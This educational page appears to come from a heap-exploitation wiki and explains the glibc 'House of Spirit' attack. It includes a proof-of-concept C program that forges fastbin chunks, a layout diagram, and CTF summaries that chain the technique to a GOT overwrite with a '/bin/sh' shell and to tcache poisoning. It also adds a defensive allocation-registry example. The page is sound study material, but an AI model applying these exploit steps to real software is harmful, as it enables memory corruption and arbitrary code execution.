House of Spirit


Basic Information

Code

House of Spirit

```c
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

// Code altered to add some prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit

struct fast_chunk {
    size_t prev_size;
    size_t size;
    struct fast_chunk *fd;
    struct fast_chunk *bk;
    char buf[0x20];               // chunk falls in fastbin size range
};

int main() {
    struct fast_chunk fake_chunks[2];   // Two chunks in consecutive memory
    void *ptr, *victim;

    ptr = malloc(0x30);

    printf("Original alloc address: %p\n", ptr);
    printf("Main fake chunk:%p\n", &fake_chunks[0]);
    printf("Second fake chunk for size: %p\n", &fake_chunks[1]);

    // Passes size check of "free(): invalid size"
    fake_chunks[0].size = sizeof(struct fast_chunk);

    // Passes "free(): invalid next size (fast)"
    fake_chunks[1].size = sizeof(struct fast_chunk);

    // Attacker overwrites a pointer that is about to be 'freed'
    // Point to .fd as it's the start of the content of the chunk
    ptr = (void *)&fake_chunks[0].fd;

    free(ptr);

    victim = malloc(0x30);
    printf("Victim: %p\n", victim);

    return 0;
}
```

Goal

  • Be able to add an address into the tcache / fast bin so that it is later possible to allocate it

Requirements

  • This attack requires the attacker to be able to create a couple of fake fast chunks that correctly indicate their size value, and then to be able to free the first fake chunk so that it gets into the bin.

Attack

  • Create fake chunks that bypass the security checks: you need 2 fake chunks, each indicating the correct size in the correct position
  • Somehow manage to free the first fake chunk so it gets into the fast or tcache bin, and then allocate it in order to overwrite that address

The code from guyinatuxedo is great for understanding the attack. This diagram from that code summarises it well:

```c
/*
this will be the structure of our two fake chunks:
assuming that you compiled it for x64

+-------+---------------------+------+
| 0x00: | Chunk # 0 prev size | 0x00 |
+-------+---------------------+------+
| 0x08: | Chunk # 0 size      | 0x60 |
+-------+---------------------+------+
| 0x10: | Chunk # 0 content   | 0x00 |
+-------+---------------------+------+
| 0x60: | Chunk # 1 prev size | 0x00 |
+-------+---------------------+------+
| 0x68: | Chunk # 1 size      | 0x40 |
+-------+---------------------+------+
| 0x70: | Chunk # 1 content   | 0x00 |
+-------+---------------------+------+

for what we are doing the prev size values don't matter too much
the important thing is the size values of the heap headers for our fake chunks
*/
```

Note that the second chunk is required in order to pass some of the allocator's sanity checks (the "invalid next size" check on the chunk that follows the one being freed).
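The checks listed above only constrain the forged chunk headers; what the defender controls is whether a pointer derived from attacker-influenced data ever reaches free() at all. The following is an added example, not code from the original page or from the referenced write-ups: a minimal allocation registry wrapping malloc/free that refuses to free any pointer the allocator did not hand out, which is exactly the step House of Spirit depends on. The registry size, the tracked_malloc/tracked_free names and the demo() function are assumptions of this example; the fake chunks it builds are constructed on the stack to replay the page's scenario.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example (not from the original page): a tiny allocation registry that
 * records every pointer handed out by tracked_malloc() and lets tracked_free()
 * refuse pointers that were never returned by the allocator, such as the
 * address of a stack-resident fake chunk. Registry size and function names
 * are assumptions for this demo. */

#define REGISTRY_SLOTS 64

static void *registry[REGISTRY_SLOTS];

/* Record a live allocation; returns 0 on success, -1 if the table is full. */
static int registry_add(void *p) {
    for (int i = 0; i < REGISTRY_SLOTS; i++) {
        if (registry[i] == NULL) { registry[i] = p; return 0; }
    }
    return -1;
}

/* Forget a live allocation; returns 1 if it was present, 0 otherwise. */
static int registry_remove(void *p) {
    for (int i = 0; i < REGISTRY_SLOTS; i++) {
        if (registry[i] == p) { registry[i] = NULL; return 1; }
    }
    return 0;
}

void *tracked_malloc(size_t n) {
    void *p = malloc(n);
    if (p != NULL && registry_add(p) != 0) {
        /* Table full: fail closed rather than hand out an untracked pointer. */
        free(p);
        return NULL;
    }
    return p;
}

/* Returns 1 if the pointer was a live allocation and has now been freed,
 * 0 if it was rejected (never allocated, already freed, or forged). */
int tracked_free(void *p) {
    if (p == NULL) return 1;          /* free(NULL) is a no-op, accept it */
    if (!registry_remove(p)) {
        fprintf(stderr, "tracked_free: rejecting pointer %p not owned by allocator\n", p);
        return 0;
    }
    free(p);
    return 1;
}

/* Replays the House of Spirit scenario from the page through the wrapper:
 * a legitimate allocation is accepted, a pointer into a stack-resident fake
 * chunk is rejected, and a double free is rejected. Returns the number of
 * checks that behaved as expected (3 when everything works). */
int demo(void) {
    struct fast_chunk { size_t prev_size, size; void *fd, *bk; char buf[0x20]; };
    struct fast_chunk fake_chunks[2];   /* constructed fake chunks on the stack */
    int ok = 0;

    memset(fake_chunks, 0, sizeof fake_chunks);
    fake_chunks[0].size = sizeof(struct fast_chunk);   /* would pass glibc's size check */
    fake_chunks[1].size = sizeof(struct fast_chunk);   /* would pass the next-size check */

    void *legit = tracked_malloc(0x30);
    if (legit != NULL && tracked_free(legit) == 1) ok++;   /* real chunk: accepted */
    if (tracked_free(&fake_chunks[0].fd) == 0) ok++;       /* forged chunk: rejected */
    if (tracked_free(legit) == 0) ok++;                    /* double free: rejected */
    return ok;
}

int main(void) {
    printf("%d/3 checks behaved as expected\n", demo());
    return 0;
}
```

The point of the registry is pointer provenance: glibc's fastbin and tcache checks look at the chunk header the pointer points at, which the forged chunks satisfy, whereas the wrapper asks whether the allocator ever produced this pointer, which they cannot satisfy. In a real code base this role is played by allocator hardening and by sanitizers such as AddressSanitizer, which abort on a free() of an address that was not returned by malloc.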

Examples

  • CTF https://guyinatuxedo.github.io/39-house_of_spirit/hacklu14_oreo/index.html
      • Libc infoleak: Via an overflow it is possible to change a pointer so it points to a GOT address, in order to leak a libc address through the read action of the CTF
      • House of Spirit: Abusing a counter that counts the number of "rifles", it is possible to generate a fake size for the first fake chunk; then, abusing a "message", it is possible to fake the size of the second chunk; finally, abusing the overflow, it is possible to change a pointer that is going to be freed so that our first fake chunk is freed. Then we can allocate it, and inside it there will be the address where "message" is stored. Next, it is possible to make this point to the scanf entry inside the GOT table, so that we can overwrite it with the address of system.
        The next time scanf is called, we can send the input "/bin/sh" and get a shell.

  • Gloater. HTB Cyber Apocalypse CTF 2024
      • Glibc leak: Uninitialized stack buffer.
      • House of Spirit: We can modify the first index of a global array of heap pointers. With a single-byte modification we call free on a fake chunk inside a valid chunk, so that we get an overlapping-chunks situation after allocating again. With that, a simple tcache poisoning attack works to obtain an arbitrary write primitive.
